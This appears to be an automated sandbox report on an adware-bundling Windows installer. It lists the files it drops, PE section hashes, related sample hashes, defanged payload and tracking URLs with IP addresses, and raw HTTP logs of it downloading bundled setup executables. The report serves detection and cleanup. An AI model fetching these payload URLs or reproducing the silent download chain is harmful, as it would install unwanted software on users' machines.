%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-vafplayer.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\boton_xl.jpg (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2-gris.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1-gris.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\PPI OptimizerPro\info.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\boton.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Dockings.dfe (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo3.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\group.html (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\templateStyle.dfe (6468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PIIAQQ9Y\doma[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet-short.gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2-gris-small.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\hq-videopro.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\mystart-toolbar-gris.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo2.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\finish.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\welcome.html (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\base.css (445 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\PPI OptimizerProinfo.dfe (2613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Wajaminfo.dfe (2823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\config.dmc (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2C.css (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U4QB9L07\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\butpause.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-printpdf.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position1A.css (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-ifish.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet.gif (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\MyBackupPcinfo.dfe (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-logo-big.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3D.css (539 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\templateDisplays.dfe (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-big.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1a.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UWC4R3L\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\instalando.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-olivebrowser.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin.dmc (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress_small.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2.png (9 bytes)
%System%\wbem\Logs\wbemprox.log (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\butplay.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\box.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.jpg (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\hide.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.png (398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\vuupc.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3C.css (638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\SM Mystartinfo.dfe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\style.css (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Browser app\info.html (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\wajam.css (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-img.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7E.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe (1431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe.config (767 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\09ac72b88ef140aa8ee609de7640785e.txt (8027 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23148 | 23552 | 4.44633 | 1c619949741a76b63a54c1e6c4d6b2f8 |
.rdata | 28672 | 4558 | 4608 | 3.62955 | 6c31e0693072284f258d2c4a271de506 |
.data | 36864 | 110520 | 1024 | 3.36948 | 78f5760d9fafb71fdbc88c3497afef46 |
.ndata | 147456 | 61440 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 208896 | 17000 | 17408 | 3.5656 | 7fae611f3f73978e9992534a50a87055 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1515
24dfc5735ffdc44ab04ecaf68c5c37c0
023e74bd64ebc99619c93b4b3d1549f9
578f66559828a9654c22b53e8922aaf3
24eaff8e36cf4c7dc3ec8ab617c96f72
c7a40961a60a30f5111e76b42bb876fb
91ac5454066fc45f94900f08326adbac
53a66efed7616a5f1edfddf2107cc06a
25b37a1d04449c97a3f4394cc7780e7f
d4de0ed3e5316de52c3fa462920671d9
5b5065a38d2f3b44ad1164ecde53a627
ff803c25f93d4519c56f550504707d01
bcd0a2f3979274cf627b5eb65e3d8bd3
390337ee47db95c1ad190a1ab76f7bb2
7194e0e4f8d47d821228baf267eda916
65cc752553b88d03ffd7741d80d5c1f1
e726975f7da8a420dce486ff812589e1
53b30d9ead31925cab1ed0c3056e4083
738eccb8e0f31ec64912d068cf29eb1d
3f00e0fad23e2a181804a527e71acbdf
4c1db3a2072077eeab9e7fd5ebf2bee0
2321f4af5c7414581ec0212f000788a0
403915c3810b587dd3bc647f87a0f36f
8e623b806e29721a02600c9a6a4f58fd
741d472facacad7638aa813d24b9baea
450ac58039e89da51df25d55cd8a1b99
35a3c356b5e513775f42448575e25796
Network Activity
URLs
URL | IP |
---|---|
hxxp://204.11.56.26/debug/Version/4_0_6_25/Nsis/CopyFiles | |
hxxp://204.11.56.26/debug/Version/4_0_6_25/Nsis/GetParameters | |
hxxp://204.11.56.26/debug/Version/4_0_6_25/Nsis/PreRun | |
hxxp://staticrr.tgusrv.com/test.html | |
hxxp://track.v2.sslsecure1.com/test.html | 204.11.56.26 |
hxxp://Track-903226030.us-west-2.elb.amazonaws.com/test.html | |
hxxp://API-XML-1918203848.us-west-2.elb.amazonaws.com/test.html | |
hxxp://API-XML-1918203848.us-west-2.elb.amazonaws.com/index.php/api/283/google-chrome/291/679/English.xml | |
hxxp://staticrr.tgusrv.com//Dictionaries/English.xml | |
hxxp://betatest.vmn.net/betatest/mystart/mystartTb_5.4.1.4_sambamedia.exe | 66.115.174.144 |
hxxp://cds.c5z6s5a3.hwcdn.net/ba/full/mon/setup.exe | |
hxxp://www.wajam-download.com/download/wajam_download.exe | 54.208.23.129 |
hxxp://dl.softservers.net/111001464/OptimizerPro.exe | 198.20.70.75 |
hxxp://s3-website-us-east-1.amazonaws.com/7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe | |
hxxp://cds.c5z6s5a3.hwcdn.net/21/all/hqv/ca/setup.exe | |
hxxp://staticrr.tgusrv.com//Styles/Templates/e9c1a9ca_Win_A_Banner_DeclineLink.zip | |
hxxp://staticrr.tgusrv.com//Displays/Templates/4934e143_Win_A_Banner-NoLink-DeclineLink.zip | |
hxxp://staticrr.tgusrv.com//Docking/Docking.zip | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/70e7b9d8_mystart.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/222ac0df_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/844a2c3b_browserapp.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/9103144e_display (1).html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/67423fe2_wajam.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/1f76ab55_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/0ba5df4c_optimizerpro2.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/7f3e6cee_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/e7bf26c3_mypcbackup.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/16220985_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/06a50625_hq-videopro.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/cb3d709d_display.html | |
hxxp://staticrr.paleokits.net//Displays/Templates/4934e143_Win_A_Banner-NoLink-DeclineLink.zip | 85.12.8.28 |
hxxp://api.v2.sslsecure4.com/index.php/api/283/google-chrome/291/679/English.xml | 54.200.36.178 |
hxxp://api.v2.sslsecure2.com/test.html | 204.11.56.26 |
hxxp://staticrr.paleokits.net//Styles/Softwares/e7bf26c3_mypcbackup.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Displays/Softwares/9103144e_display (1).html | 85.12.8.28 |
hxxp://track.v2.sslsecure3.com/test.html | 204.11.56.26 |
hxxp://api.v2.sslsecure3.com/test.html | 204.11.56.26 |
hxxp://staticrr.paleokits.net//Styles/Softwares/844a2c3b_browserapp.zip | 85.12.8.28 |
hxxp://aff-software.s3-website-us-east-1.amazonaws.com/7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe | 54.231.2.20 |
hxxp://staticrr.paleokits.net//Displays/Softwares/16220985_display.html | 85.12.8.28 |
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_25/Nsis/CopyFiles | |
hxxp://staticrr.paleokits.net//Dictionaries/English.xml | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Displays/Softwares/cb3d709d_display.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Docking/Docking.zip | 85.12.8.28 |
hxxp://dl.newonlinedemoserv.com/21/all/hqv/ca/setup.exe | 69.16.175.10 |
hxxp://staticrr.paleokits.net//Displays/Softwares/222ac0df_display.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net/test.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Softwares/67423fe2_wajam.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Templates/e9c1a9ca_Win_A_Banner_DeclineLink.zip | 85.12.8.28 |
hxxp://api.v2.sslsecure1.com/test.html | 204.11.56.26 |
hxxp://staticrr.paleokits.net//Displays/Softwares/7f3e6cee_display.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Softwares/70e7b9d8_mystart.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Softwares/06a50625_hq-videopro.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Displays/Softwares/1f76ab55_display.html | 85.12.8.28 |
hxxp://api.v2.sslsecure4.com/test.html | 54.200.36.178 |
hxxp://staticrr.paleokits.net//Styles/Softwares/0ba5df4c_optimizerpro2.zip | 85.12.8.28 |
hxxp://track.v2.sslsecure4.com/test.html | 54.186.105.91 |
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_25/Nsis/GetParameters | |
hxxp://dl.newonlinedemoserv.com/ba/full/mon/setup.exe | 69.16.175.10 |
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_25/Nsis/PreRun | |
hxxp://track.v2.sslsecure2.com/test.html | 204.11.56.26 |
s3.amazonaws.com | 54.231.2.152 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /test.html HTTP/1.1
Host: track.v2.sslsecure1.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:22 GMT
Server: Apache
Set-Cookie: vsid=912vr1639663426406766; expires=Mon, 18-Nov-2019 18:12:22 GMT; path=/; domain=track.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /index.php/api/283/google-chrome/291/679/English.xml HTTP/1.1
Accept-Encoding: gzip, deflate,gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: api.v2.sslsecure4.com
Connection: Close
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding: gzip
Content-Type: text/xml; charset=utf-8
Date: Wed, 19 Nov 2014 18:12:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: nginx
Set-Cookie: symfony=s28oriin477t5gh1negh78ijf2; path=/
transfer-encoding: chunked
Connection: Close
1ac7..............ks.H....;b...D....X.._f...MnoK..T....P@$$aD.l......~......E.U.dgOx....B.....J.....I...b?.~..r$.....p..W?.e.\J._....?..j.N....z5..K.j.......z._.....;g....d[Q..1...m....y...H.7h...-.!..li.....?..*[.i[........K.&.O....Oe.4.Og....d.,..f..4..._.RI.*,.C!.\)......F..1.4..\.j.......i..#KQ,YUd[.5.^........i ...gY.:........@2.IM..L........j,...{u.F..;K...8o..j..z.Q8..wa...n.......N.._..8q...EG.{.%........(...B........$.'..k&P.2...ny.u.MzK.y...........Ap5...#...aY....7.M...5........g..q[w4.St.....w..n.x...<......&~...G...e].....l......~..Y...o..sF....\..EY.De.3.G7....my....p3.}......M.3.i.....g7y./....`...L.W....'.?.x]7.7...e..|..ux...'.xSe..<.{.....^.6`z:a..6o.H.p..<.>.M...(......0./.W.6.p......^]E.M%..B.....jwwwwG.>.....(..?......}...../.......,y.@'.T......!.....a.x.')...<s.6...}...$;..7K.P..>....w..l.bI65'....7Q8..Zkw.$....W....Y8.G.....';.u.L.?,No.Zv%kv..w..Q...................A{.....P.....]Y.Y.i=......=...!.V-K..^...`.U...k.#U.X.\].1 .x.i.^............... .....q.E..r.z.....b...*..E...cFv....M....<...q....t...?.u.,..`>}............Y.$.k.....[.Z&Z.-Z .......D......{.f....N.a0.E......_$o..//...u9q....K.cy..C......Iktu.]...6....R..^.C..K2.r.}.3..RT......<._.3.M.....h]!?.6...![..ie."..`.|o...yo..Ny.O.d.#._."...._...^........o.W...4.......G..}.I.../..x.8./.;7.V...}...I..W...{..=.......YY..Y......x..<._..Q{..C/......._K.. .[.j.~.N.V..U.F. H...6.z(o.L...}..e.=.(.;.C.......t....c...E.Xt6S..&.`.v...:^..l....n..jH.NdJ.<..m.N..<.z.usH....7>......../.B...xt.?.(?........m
<<< skipped >>>
GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:53 GMT
ETag: "66d4e-f0c0-4f9ee97e8ed40"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w1|VGzdn|VGzdn; path=/
Cache-control: private
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@..................................`..............................................................P...p............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata...0...p...........................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:31 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416410780"
Last-Modified: Wed, 19 Nov 2014 15:26:20 GMT
Cache-Control: max-age=836
Content-Length: 11715336
Content-Type: application/x-msdownload
X-HW: 1416420751.dop008.ny2.t,1416420751.cds007.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P.....................n......-A............@........................................... ..............................p......................h................................................................................................text...<........................... .0`.data...............................@.0..rdata..8$.......&..................@.0@.bss..................................0..idata.......p......................@.0..ndata...`....... ..................@.0..rsrc...............................@.0.................................................................................................................................................................................................................................................................................................................................................................................U..WVS.......U..E....t...F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E...$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT........FP..E........}..VP........U.......FT.............}..........E..M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q....~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX..$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>
GET //Displays/Softwares/9103144e_display (1).html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: text/html
Last-Modified: Tue, 01 Jul 2014 09:28:50 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
2215...............r..q...*..D.;R.I.....*.9.`C....y...CbV .......6o.T%O.7.'...>gf..k..l.....s.....t....?>N....]o.\U.}.W.z..............go4.s:..G..K..~..w.*...{1 W..X..q.z...Y]..b]...(W...u...v.?.g..?..wo..I..w/6.f./^.../g.m.l.d..........^g.......O...e.M.......6....:.R.9..o^/~.......,..../~...7.*...\..{..@h=..|...zSmg..N..f.......N.m...q.riw......j.I....(.V..*_...&....$N..6y.oy..Vy.h.v=...6.".E`y}.W'o^k....o[..>...s..K..|....r...."(../..r.?..].. v$..\....I.%.Gx.[....b....` ...pmQ,s..J..]gweUl.nSV.(..Z.....b..v_.t)./6....u*..9EB...v.WG..En.r...Y^.Y.....Yg...m.Y....V"( ....6.....s..<0V....\.&.3...^B.?o..3[...;.^3./.Te..|..7...i..?l.*...?..f.z..f.Z2..[..:...........v.,f...H/.....^~_.....w.O?.Ww..~..W.M...5.X......#.........>..G..)'|........_-.l......o.:........f.[=\j..u.....c....a...z....;$.Lz`w.1..l..,V..v..^m.OttY.....`n...>J..zs.......m....Js..v.r/.......C.nWs.b.55<Jn.M..n..#...Y...Q".*..G...)..\.zs..LAF..O?.g...].{@....j....%......X....*/._q..[...l......a.]V,. ......oW....._.wI^s._Q............l.,...y9...x......l.WI......|H^.P....oZ.s.....3....HUN.)L..>.bc.2.A.@,.R..np6"......A..L...TGZ....e.x..:..S./.....eYeI.u.....A.Dy.......`o..z.E...*....a......;.g5._......f.'...3#..v'M..<...!Vsx.B...Q..~d..V.{.7..........D.!.O.w..0E.7d...V@.j.g.$!hf-.pL...H..!....|......J..]V.....-.....{.. ..*.j ...p.5....E2I...9Q.9t...P. P@...k=..M.X@...y..kU...J.......:..Eb.G.%....RQq..k0...3.........0C..I......7..>H........:)...p...'....l..G...a......#....I2z.\L...|..&i2.....~..g...........7<K.|L.i2N....
<<< skipped >>>
GET /test.html HTTP/1.1
Host: api.v2.sslsecure3.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:24 GMT
Server: Apache
Set-Cookie: vsid=921vr1639663443705083; expires=Mon, 18-Nov-2019 18:12:24 GMT; path=/; domain=api.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /test.html HTTP/1.1
Host: track.v2.sslsecure3.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:23 GMT
Server: Apache
Set-Cookie: vsid=915vr1639663431904681; expires=Mon, 18-Nov-2019 18:12:23 GMT; path=/; domain=track.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /debug/Version/4_0_6_25/Nsis/GetParameters HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:11:58 GMT
Server: Apache
Set-Cookie: vsid=913vr1639663183724887; expires=Mon, 18-Nov-2019 18:11:58 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<html>..<head><meta name="tids" content="a='471' b='1912' c='sslsecure1.com' d='manual_mapped'" /><title>sslsecure1.com</title>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<style type="text/css">../*RESET*/..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,th,var{font-style:normal;font-weight:normal;}ol,ul {list-style:none;}caption,th {text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym {border:0;}../*COMMON*/...wrapper {text-align: center;}...img {margin:0px; margin-bottom:-11px !important;}...wrapper table { text-align: left; margin: 0 auto; font-family: arial, sans-serif; color: #515151; font-size: 12px;.}...h-list {background: url(hXXp://i2.cdn-image.com/__media__/pics/471/top-nav-bg.gif) repeat-x left top;}...h-list li {display: inline; text-align:left;}...h-list li strong {color: #358a35;}..h2 {color: #63ad63; font-size: 14px; font-weight: bold;}../*HEADER*/..#header {border-top: 4px solid #358a35; padding-top: 8px;}..#header .cufondiv h1 a {...color: #63ad63;...font-weight: bold;...font-size: 35px;...text-decoration: none;...font-family: "ChunkFive", arial, serif;...font-weight:bold;...}..#header .normalfondiv h1 a
<<< skipped >>>
GET /test.html HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
8..correct...0..
GET /test.html HTTP/1.1
Host: api.v2.sslsecure4.com
Connection: Close
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 19 Nov 2014 18:12:24 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...
GET /test.html HTTP/1.1
Host: track.v2.sslsecure2.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:22 GMT
Server: Apache
Set-Cookie: vsid=921vr1639663429504924; expires=Mon, 18-Nov-2019 18:12:22 GMT; path=/; domain=track.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET //Styles/Softwares/70e7b9d8_mystart.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
